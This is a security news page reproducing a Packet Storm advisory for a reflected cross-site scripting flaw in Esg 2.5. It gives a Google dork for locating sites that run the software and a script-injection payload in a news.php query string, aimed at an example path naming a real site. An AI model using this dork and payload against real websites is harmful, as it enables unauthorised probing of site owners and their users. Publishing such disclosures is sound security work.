Security
Headlines
HeadlinesLatestCVEs

Headline

Esg 2.5 Cross Site Scripting

Esg version 2.5 suffers from a cross site scripting vulnerability.

Packet Storm
#sql#xss#csrf#vulnerability#web#ios#mac#windows#apple#google#ubuntu#linux#debian#cisco#java#php#perl#auth#ruby#firefox

Esg 2.5 Cross Site Scripting

Posted May 24, 2023

Authored by indoushka

Esg version 2.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | af04171eca15deed52f8552f83c674dd50fbac0bfc4810eb316c96bde1b17488

Download | Favorite | View

Esg 2.5 Cross Site Scripting

===========================================================================================| # Title     : Esg 2.5 XSS Vulnerability                                                 || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>Greetings to :===================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|=================================================================================================

File Tags

  • ActiveX (932)
  • Advisory (81,187)
  • Arbitrary (16,018)
  • BBS (2,859)
  • Bypass (1,690)
  • CGI (1,024)
  • Code Execution (7,128)
  • Conference (677)
  • Cracker (841)
  • CSRF (3,315)
  • DoS (23,129)
  • Encryption (2,360)
  • Exploit (51,088)
  • File Inclusion (4,193)
  • File Upload (952)
  • Firewall (821)
  • Info Disclosure (2,712)
  • Intrusion Detection (883)
  • Java (2,998)
  • JavaScript (838)
  • Kernel (6,550)
  • Local (14,376)
  • Magazine (586)
  • Overflow (12,597)
  • Perl (1,421)
  • PHP (5,123)
  • Proof of Concept (2,302)
  • Protocol (3,559)
  • Python (1,499)
  • Remote (30,474)
  • Root (3,552)
  • Rootkit (505)
  • Ruby (607)
  • Scanner (1,633)
  • Security Tool (7,845)
  • Shell (3,159)
  • Shellcode (1,211)
  • Sniffer (892)
  • Spoof (2,189)
  • SQL Injection (16,219)
  • TCP (2,394)
  • Trojan (687)
  • UDP (883)
  • Virus (664)
  • Vulnerability (31,548)
  • Web (9,548)
  • Whitepaper (3,742)
  • x86 (958)
  • XSS (17,668)
  • Other

File Archives

  • May 2023
  • April 2023
  • March 2023
  • February 2023
  • January 2023
  • December 2022
  • November 2022
  • October 2022
  • September 2022
  • August 2022
  • July 2022
  • June 2022
  • Older

Systems

  • AIX (428)
  • Apple (1,970)
  • BSD (372)
  • CentOS (57)
  • Cisco (1,920)
  • Debian (6,746)
  • Fedora (1,691)
  • FreeBSD (1,244)
  • Gentoo (4,312)
  • HPUX (879)
  • iOS (342)
  • iPhone (108)
  • IRIX (220)
  • Juniper (67)
  • Linux (45,712)
  • Mac OS X (685)
  • Mandriva (3,105)
  • NetBSD (256)
  • OpenBSD (482)
  • RedHat (13,293)
  • Slackware (941)
  • Solaris (1,610)
  • SUSE (1,444)
  • Ubuntu (8,597)
  • UNIX (9,230)
  • UnixWare (186)
  • Windows (6,554)
  • Other

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution